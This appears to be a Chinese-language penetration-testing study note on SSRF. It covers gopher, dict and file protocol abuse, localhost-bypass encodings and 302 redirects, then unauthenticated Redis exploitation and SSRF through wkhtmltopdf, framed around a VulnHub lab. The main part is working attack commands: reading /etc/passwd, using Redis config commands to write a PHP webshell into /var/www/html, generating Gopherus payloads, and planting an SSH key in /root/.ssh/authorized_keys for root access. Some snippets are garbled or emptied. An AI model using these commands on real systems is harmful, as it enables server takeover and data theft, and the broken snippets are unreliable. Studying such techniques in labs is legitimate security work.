格式:dict:///127.0.0.1:6379(返回端口的信息)file协议(读取文件)
格式:file:///etc/passwdgopher协议(常用的协议,可以攻击内网) SSRF 数字ip绕过
127.0.0.1可以替换为以下
0//代表本地地址 localhost//本地 2130706433//将127.0.0.1–>2130706433 转换为10进制302跳转
在线短链接:http://www.metools.info/master/m56.html?ivk_sa=1
很大可能ssrf会跟随302跳转
跳转前
跳转后
总结ssrf会自动跟随跳转链接
SSRF下的实战 SSRF->Redis kali环境下安装redis安装redis
apt-get update apt-get install redis-server
修改配置文件使其能外连
配置文件:/etc/redis/redis.conf
重新加载配置文件
redis-server /etc/redis/redis.conf //加载刚才修改的配置文件
输入netstat -pantl查看监听,如下图
测试是否能远连
另外一台机器也安装redis
apt-get update apt-get install redis-server
连接redis
redis-cli -h 192.168.163.131 //-h后面添加目标机器 输入ping //返回pong代表成功Redis渗透 ssrf+webshell(手动写入)
redis写入
能直接链接无密码,并且需要绝对路径和具有文件读写增删改查权限
config set dir /var/www/html # 设置工作目录 写入木马需要知道绝对路径 config set dbfilename shell.php #设置备份文件名 set shell "" #设置值,shell这名字可以随便设置 save #保存
返回靶机进入/var/www/html目录下查看 //不是自己的机器,是靶机
访问链接
SSRF+Redis(webshell)gopherus (快速脚本)
工具下载链接 https://github.com/tarunkant/Gopherus //python2 下运行
webshell
直接用gopherus生成shell
python2 gopherus.py --exploit redis
选择PHPshell
默认的php版本为**/var/www/html**,默认shell名为shell.php
SSRF+ssh写入密钥攻击机上生成密钥
ssh-keygen -t rsa//狂按回车就好
这时候将公钥的前面和后面添加空行防止乱码
echo -e //启用转义字符 (echo -e "nnn";cat /etc/.ssh/id_rsa.pub;echo -e "nnn") >> a.txt
传入键值
cat a.txt|redis-cli -h 192.168.163.131 -x set ssh // -x参数是指 接受传入的值 并作为参数
修改目录
config set dir /root/.ssh # 更改设置工作目录 config set dbfilename authorized_keys #设置备份文件名 save #保存
链接靶机
ssh 192.168.163.131 -i id_rsa
登录成功
文档下的SSRF wkhtmltopdf(0.12.5)参考 https://zhuanlan.zhihu.com/p/422914473 //火线 PDF解析器html/XSS 实现SSRF https://zhuanlan.zhihu.com/p/137469275 //基础介绍 http://hassankhanyusufzai.com/安装在kali下
apt-get install libfontenc1 xfonts-75dpi xfonts-base xfonts-encodings xfonts-utils openssl build-essential libssl-dev libxrender-dev git-core libx11-dev libxext-dev libfontconfig1-dev libfreetype6-dev fontconfig -y wget https://github.com/wkhtmltopdf/wkhtmltopdf/releases/download/0.12.5/wkhtmltox_0.12.5-1.buster_amd64.deb dpkg -i wkhtmltox_0.12.5-1.buster_amd64.deb apt --fix-broken install wkhtmltox -V //查看信息wkhtmltopdf基本命令和学习 简介
1.wkhtmltopdf基于Qt WebKit 引擎 2.基于命令行的工具 //跨平台,win和linux都行 3,可以将html页面转换为pdf文件 4.wkhtmltopdf 1.html 1.pdf //将1.html转为 1.pdf测试
//vps上设置跳转 ">//本地html设置 wkhtmltopdf 1.html 1.pdf //测试是否成功靶场实例(Gemini-Pentest-v1)
https://download.vulnhub.com/geminiinc/Gemini-Pentest-v1.zip //Gemini-Pentest-v1 https://xz.aliyun.com/t/2902#toc-6//前辈已经写过
